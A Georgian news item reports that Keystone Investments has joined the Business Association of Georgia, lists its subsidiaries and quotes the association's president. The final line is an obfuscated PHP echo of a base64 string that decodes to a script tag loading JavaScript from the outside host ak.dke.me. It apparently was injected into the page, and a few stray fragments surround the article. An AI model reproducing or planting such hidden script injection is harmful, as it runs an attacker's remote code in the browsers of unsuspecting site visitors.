celsiusi
ავერსი შნაიდერი

 „ქისთოუნ ინვესთმენთსი“ ერთ-ერთი წამყვანი მრავალპროფილური საინვესტიციო ჰოლდინგი საქართველოს ბიზნეს ასოციაციის წევრი გახდა.

ბიზნეს ასოციაციის ინფორმაციით, კომპანია 2016 წლიდან ინვესტიციებს საქართველოს ეკონომიკის სწრაფად მზარდ სექტორებსა და ისეთ კომპანიებში ახორციელებს, რომლებსაც საინტერესო ბიზნეს მოდელი აქვთ, ჰყავთ ძლიერი მენეჯმენტი და ამავდროულად საჭიროებენ დამატებით კაპიტალს, ზრდის შემდეგი ეტაპისთვის.

ჰოლდინგის საინვესტიციო პორტფელი კომპანიებს სხვადასხვა სექტორებში მოიცავს, როგორიცაა: საცალო ვაჭრობა, სოფლის მეურნეობა, ენერგეტიკა, მშენებლობა და წარმოება.

ამჟამად ჰოლდინგში შემავალი ძირითადი კომპანიებია ქისთოუნ დეველოპმენტი, ქისთოუნ აგრო, მაგნიტი, Construction Service-ი და Keystone Power -ი.

„ქისთოუნ დეველოპმენტი“ ქალაქის ცენტრალურ ნაწილში, კერძოდ კრწანისში, მრავალფუნქციურ პრემიუმ საცხოვრებელი კომპლექსის მშენებლობას ახორციელებს და მისი საინვესტიციო ღირებულება 50 მლნ აშშ დოლარია.

ასევე, ჰოლდინგი აქტიურადაა ჩართული ლურჯი მოცვის ბაღების გაშენების პროცესში, კერძოდ, „ქისთოუნ აგრო“ დასავლეთ საქართველოში 200 ჰექტარზე გაშენებულ თანამედროვე სტანდარტების ლურჯი მოცვის ბაღებს ფლობს და ავითარებს.

ჰოლდინგის ნაწილია სუპერმარკეტების ქსელი მაგნიტი, რომელიც საქართველოს რეგიონებში ყველაზე დიდი კომპანიაა ბაზრის წილით.

ასევე, აღსანიშნავია, Construction Service-ი, წამყვანი სამშენებლო კომპანია, რომელიც ორიენტირებულია ლითონის კონსტრუქციების წარმოებასა და მონტაჟზე, ასევე, ხიდების მშენებლობაზე.

მნიშვნელოვანია ჰოლდინგის წარმატება 50+ მეგავატიან ქარის ელექტროსადგურის განვითარების კუთხითაც, რომელსაც წარმოადგენს Keystone Power-ი.

„ქისთოუნ ინვესთმენთსი“ მრავალპროფილური საინვესტიციო ჰოლდინგია, რომელიც ბაზარზე 2016 წლიდან ოპერირებს. საქართველოს ბიზნეს ასოციაციისთვის მნიშვნელოვანია ასეთი მსხვილი, წარმატებული და მრავალფეროვანი გამოცდილების მქონე კომპანიებთან თანამშრომლობა, რათა უკეთ მოხდეს ბიზნეს სექტორში არსებული პრობლემატური საკითხების წარმოჩენა და მათი ერთობლივი გადაწყვეტა. მივესალმებით „ქისთოუნ ინვესთმენთს“ BAG-ში და დარწმუნებული ვართ, რომ ჩვენი თანამშრომლობა პროდუქტიული იქნება“ განაცხადა საქართველოს ბიზნეს ასოციაციის პრეზიდენტმა, სოსო ფხაკაძემ.

90
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");